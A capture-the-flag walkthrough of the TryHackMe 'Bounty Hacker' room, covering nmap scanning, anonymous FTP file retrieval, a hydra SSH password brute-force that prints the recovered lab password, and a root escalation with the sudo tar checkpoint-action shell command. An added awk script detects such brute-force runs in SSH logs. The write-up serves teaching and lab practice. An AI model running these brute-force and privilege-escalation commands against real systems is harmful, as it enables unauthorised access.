# Bounty Hunter

![](/files/-MbDB-qCzkzn4SooRDbq)

## Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (**-Pn**), which skips host discovery.

```
nmap -Pn 10.10.28.194
```

![](/files/-MbDBViYP0a_GcvJsRQz)

Detailed nmap scan:

Command breakdown:

* (**-sV**): Service version detection
* (**-sC**): Default nmap scripts
* (**-p**): Specifying ports 21, 22, 80
* (**-oN nmap**): Saving the output to a file called nmap

```
nmap -sC -sV -p 21,22,80 -oN nmap 10.10.28.194
```

![](/files/-MbDC6d_a2P5fbCVBYYd)

## Enumeration

### Port 21

We can see in the nmap scan that anonymous FTP login is allowed on port 21 (FTP). Let's log in and see what it has.

```
ftp 10.10.28.194
```

Once we log in and list the files, we can see two files, `locks.txt` and `task.txt`. Let's transfer both of them to our machine using the `get` command.

```
get <file-name>
```

![](/files/-MbDDEWaS8tDVEoCtMFd)

Let's read the `task.txt` file first.

```
cat task.txt
```

![](/files/-MbDDRVQAcABydj8Fs0m)

We found a user called `lin`, which is the answer to the third question.

![](/files/-MbDDYc_yiItjUpjy8ay)

Now let's read the file `locks.txt`.

```
cat locks.txt
```

![](/files/-MbDDf97eEodOmCrxSXw)

Looks like a password list. Now, with a username and a password list, we can try brute-forcing SSH using a tool called `hydra`.

## Initial Foothold

Command breakdown:

* (**-l**): Specifying the username
* (**-P**): Specifying a file of passwords to try
* (**ssh**): Specifying which protocol to attack

```
hydra -l lin -P /root/Desktop/TryHackMe/BountyHacker/locks.txt 10.10.28.194 ssh
```

![](/files/-MbDEBn8N5XMMayVjChr)

We found the password `RedDr4gonSynd1cat3`. Let's log in through SSH. Also, the answer to the fourth question is SSH, and the answer to the fifth question is the password we found using hydra.

![](/files/-MbDF6V8synaYGtIbvjn)

![](/files/-MbDFHIe9YJ5hTcOg5eJ)

We have user privileges, so we can go read the `user.txt` file, which I already did, but you will have to find that on your own. :)
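On the target's side, a password-list run like the one above appears in the SSH log as a burst of failed logins for `lin` from one address, followed by a success. The following is an added example, not part of the original write-up, that reports exactly that pattern; it assumes the standard OpenSSH `Failed password` / `Accepted password` syslog lines, and the function names, log lines, host name and IP addresses are constructed.

```shell
# Added example: report SSH password guessing that ends in a successful login.
# Usage on a real host (path is an assumption): detect_ssh_bruteforce 5 < /var/log/auth.log

detect_ssh_bruteforce() {
    # $1 = failures from one source that make a later success suspicious
    awk -v threshold="${1:-5}" '
    # Source address: the field after the word "from".
    function src(   i) {
        for (i = 1; i < NF; i++) if ($i == "from") return $(i + 1)
        return ""
    }
    # Account name: the field after "for", skipping the "invalid user"
    # prefix that sshd adds for accounts that do not exist.
    function account(   i) {
        for (i = 1; i < NF; i++) if ($i == "for") {
            if ($(i + 1) == "invalid" && $(i + 2) == "user") return $(i + 3)
            return $(i + 1)
        }
        return ""
    }
    /sshd\[[0-9]+\]: Failed password for / {
        fails[account() SUBSEP src()]++
        next
    }
    /sshd\[[0-9]+\]: Accepted password for / {
        key = account() SUBSEP src()
        if (fails[key] + 0 >= threshold + 0)
            printf "ALERT user=%s src=%s failed_before_success=%d\n",
                   account(), src(), fails[key]
        fails[key] = 0   # a success resets the count for this user and source
    }'
}

# Constructed sample log: a guessing run from 203.0.113.7 and one mistyped
# password from 198.51.100.20 that must not raise an alert.
sample_auth_log() {
    cat <<'EOF'
Jun  1 10:00:01 host sshd[2001]: Failed password for lin from 203.0.113.7 port 40001 ssh2
Jun  1 10:00:02 host sshd[2002]: Failed password for lin from 203.0.113.7 port 40002 ssh2
Jun  1 10:00:03 host sshd[2003]: Failed password for lin from 203.0.113.7 port 40003 ssh2
Jun  1 10:00:04 host sshd[2004]: Failed password for invalid user admin from 203.0.113.7 port 40004 ssh2
Jun  1 10:00:05 host sshd[2005]: Failed password for lin from 203.0.113.7 port 40005 ssh2
Jun  1 10:01:00 host sshd[2010]: Failed password for lin from 198.51.100.20 port 51000 ssh2
Jun  1 10:01:09 host sshd[2011]: Accepted password for lin from 198.51.100.20 port 51001 ssh2
Jun  1 10:02:00 host sshd[2020]: Accepted password for lin from 203.0.113.7 port 40006 ssh2
EOF
}

sample_auth_log | detect_ssh_bruteforce 3
```

The counter is keyed on user and source address together, so a single attacker address guessing against one account is caught while an unrelated typo from another address is not.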

## Privilege Escalation

Let's run the `sudo -l` command to check which commands we can run as other users.

```
sudo -l
```

![](/files/-MbDFrcdlTnDVVbFkYfp)

Looks like we can run `/bin/tar` as root. Now we can go to [GTFOBins](https://gtfobins.github.io/gtfobins/tar/#sudo) and find the command to escalate privileges to root. The command they give is this.

```
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
```

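Once we run this, we are root: `--checkpoint-action=exec=/bin/sh` makes tar execute `/bin/sh` at its first checkpoint, and because tar was started through sudo, that shell runs as root.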

![](/files/-MbDGOJLNB119bAW43q9)

Now you can go read the `root.txt` file and answer the last question.

